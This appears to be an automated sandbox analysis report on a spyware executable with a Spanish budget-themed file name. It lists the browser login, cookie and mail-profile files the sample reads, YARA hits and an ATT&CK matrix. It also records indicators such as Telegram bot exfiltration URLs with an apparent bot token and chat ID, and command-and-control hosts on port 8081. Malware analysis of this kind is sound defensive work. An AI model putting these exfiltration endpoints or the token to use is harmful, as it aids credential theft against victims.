                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      111
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      1
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                      Virtualization/Sandbox Evasion
                      Security Account Manager31
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares1
                      Data from Local System
                      3
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture4
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      System Network Configuration Discovery
                      SSHKeylogging15
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                      Obfuscated Files or Information
                      Cached Domain Credentials13
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                      Software Packing
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      PRESUPUESTO DE NOVIEMBRE...exe45%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                      PRESUPUESTO DE NOVIEMBRE...exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      http://checkip.dyndns.org/0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      http://checkip.dyndns.org/q0%URL Reputationsafe
                      https://reallyfreegeoip.org0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      reallyfreegeoip.org
                      188.114.97.3
                      truetrue
                        unknown
                        api.telegram.org
                        149.154.167.220
                        truetrue
                          unknown
                          checkip.dyndns.com
                          132.226.247.73
                          truefalse
                            unknown
                            checkip.dyndns.org
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                unknown
                                https://reallyfreegeoip.org/xml/173.254.250.77false
                                  unknown
                                  http://checkip.dyndns.org/false
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.office.com/PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://duckduckgo.com/chrome_newtabPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.office.com/lB_qPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://chrome.google.com/webstore?hl=enlB_qPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://duckduckgo.com/ac/?q=PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.telegram.orgPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmptrue
                                            unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://api.telegram.org/botPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmptrue
                                                unknown
                                                http://tempuri.org/DataSet1.xsdPRESUPUESTO DE NOVIEMBRE...exefalse
                                                  unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://chrome.google.com/webstore?hl=enPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://www.ecosia.org/newtab/PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://varders.kozow.com:8081PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://aborters.duckdns.org:8081PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://ac.ecosia.org/autocomplete?q=PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://reallyfreegeoip.org/xml/173.254.250.77$PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000319A000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://51.38.247.67:8081/_send_.php?LPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://anotherarmy.dns.army:8081PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20aPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://checkip.dyndns.org/qPRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://reallyfreegeoip.orgPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://api.telegram.orgPRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003328000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedPRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://reallyfreegeoip.org/xml/PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        149.154.167.220
                                                                        api.telegram.orgUnited Kingdom
                                                                        62041TELEGRAMRUtrue
                                                                        188.114.97.3
                                                                        reallyfreegeoip.orgEuropean Union
                                                                        13335CLOUDFLARENETUStrue
                                                                        132.226.247.73
                                                                        checkip.dyndns.comUnited States
                                                                        16989UTMEMUSfalse
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1545933
                                                                        Start date and time:2024-10-31 10:34:05 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 8m 7s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:12
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:PRESUPUESTO DE NOVIEMBRE...exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/1@4/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 102
                                                                        • Number of non-executed functions: 14
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • VT rate limit hit for: PRESUPUESTO DE NOVIEMBRE...exe
                                                                        TimeTypeDescription
                                                                        05:35:00API Interceptor9527548x Sleep call for process: PRESUPUESTO DE NOVIEMBRE...exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        149.154.167.220PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                          Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                                                                            188.114.97.318in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.timizoasisey.shop/3p0l/
                                                                                            lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                            • touxzw.ir/alpha2/five/fre.php
                                                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • paste.ee/d/vdlzo
                                                                                            Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.bayarcepat19.click/g48c/
                                                                                            zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                            • touxzw.ir/alpha2/five/fre.php
                                                                                            rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.launchdreamidea.xyz/2b9b/
                                                                                            rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                                            • ghcopz.shop/ClarkB/PWS/fre.php
                                                                                            PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                            SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                            • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                            5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                            • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                            132.226.247.73Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            reallyfreegeoip.orgGun Ici Cek Statu Listesi.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 188.114.97.3
                                                                                            PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.96.3
                                                                                            PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.96.3
                                                                                            rCommercialoffer_Technicaloffer_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            PG567777878-H677889978-6G89O9I4567778.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            INVOICE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            checkip.dyndns.comGun Ici Cek Statu Listesi.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 158.101.44.242
                                                                                            PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 158.101.44.242
                                                                                            Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 132.226.247.73
                                                                                            PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 158.101.44.242
